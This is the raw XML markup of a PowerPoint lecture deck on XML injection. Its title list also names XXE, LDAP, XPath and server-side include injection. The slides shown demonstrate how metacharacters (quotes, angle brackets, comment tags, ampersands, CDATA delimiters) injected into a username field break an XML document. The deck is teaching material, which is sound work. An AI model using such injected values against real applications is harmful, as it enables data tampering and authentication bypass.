              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>="$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>inputValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>inputValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>’’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>""/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rettangolo 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="3744989"/>
            <a:ext cx="38884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Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>formed</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rettangolo 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="6093296"/>
            <a:ext cx="38884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Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>formed</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319899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it-IT" b="1" dirty="0" err="1"/>
              <a:t>Angular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>parentheses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: &gt; and &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>	&lt;username&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&lt;&lt;/username&gt; 	&lt;password&gt;Un6R34kb!e&lt;/password&gt; 	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&gt;500&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&gt; 	&lt;mail&gt;s4tan@hell.com&lt;/mail&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rettangolo 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="5517232"/>
            <a:ext cx="38884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Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>formed</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28634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fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: &lt;!--/--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;!—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>	&lt;username&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;!--&lt;/username&gt; 	&lt;password&gt;Un6R34kb!e&lt;/password&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;500&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>	&lt;mail&gt;s4tan@hell.com&lt;/mail&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Ampersand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>tagnode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt;&amp;lt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>tagnode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t> Username = &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>	&lt;username&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&lt;/username&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>	&lt;password&gt;Un6R34kb!e&lt;/password&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt;500&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>	&lt;mail&gt;s4tan@hell.com&lt;/mail&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2900" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113842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it-IT" b="1" dirty="0"/>
              <a:t>CDATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>delimiters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: &lt;![CDATA[ / ]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt; &lt;![CDATA[&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;]]&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;username&gt;&lt;![CDATA[&lt;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>]]&gt;&lt;/username&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> = ]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;username&gt;&lt;![CDATA[]]&gt;]]&gt;&lt;/username&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rettangolo 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="4797152"/>
            <a:ext cx="38884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Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>formed</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212506658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6599</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (4:3)</PresentationFormat>
  <Paragraphs>523</Paragraphs>
  <Slides>50</Slides>
  <Notes>27</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50</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="53" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tema di Office</vt:lpstr>
      <vt:lpstr>XML Injection</vt:lpstr>
      <vt:lpstr>Starting xml</vt:lpstr>
      <vt:lpstr>Injection data</vt:lpstr>
      <vt:lpstr>Injected xml</vt:lpstr>
      <vt:lpstr>Discovery</vt:lpstr>
      <vt:lpstr>Xml Metacharacters</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>External Entities</vt:lpstr>
      <vt:lpstr>External Entities</vt:lpstr>
      <vt:lpstr>External Entities</vt:lpstr>
      <vt:lpstr>How SAML works</vt:lpstr>
      <vt:lpstr>External Entities: examples of attack</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Essentials</vt:lpstr>
      <vt:lpstr>LDAP Injection</vt:lpstr>
      <vt:lpstr>intro</vt:lpstr>
      <vt:lpstr>Search Filters</vt:lpstr>
      <vt:lpstr>Login</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>XPATH Injection</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Security Implications</vt:lpstr>
      <vt:lpstr>Simple XPATH Injection</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Blind Xpath Injection</vt:lpstr>
      <vt:lpstr>Blind Xpath Injection: the process</vt:lpstr>
      <vt:lpstr>Xpath Crawling</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Booleanization of XPath Scalar Queries</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Mounting a Blind Xpath injection</vt:lpstr>
      <vt:lpstr>Defending against Xpath Injection</vt:lpstr>
      <vt:lpstr>Server Side Injection</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>SSI Commands</vt:lpstr>
      <vt:lpstr>Other SSI Commands</vt:lpstr>
      <vt:lpstr>Some examples</vt:lpstr>
      <vt:lpstr>Black Box Testing</vt:lpstr>
      <vt:lpstr>Grey Box Testing</vt:lpstr>
      <vt:lpstr>ssi commands…</vt:lpstr>
      <vt:lpstr>…ssi commands…</vt:lpstr>
      <vt:lpstr>…ssi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Injection</dc:title>
  <dc:creator>Thebrain</dc:creator>
  <cp:lastModifiedBy>corrado aaron visaggio</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-02T17:39:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-27T20:11:34Z</dcterms:modified>
</cp:coreProperties>
</file>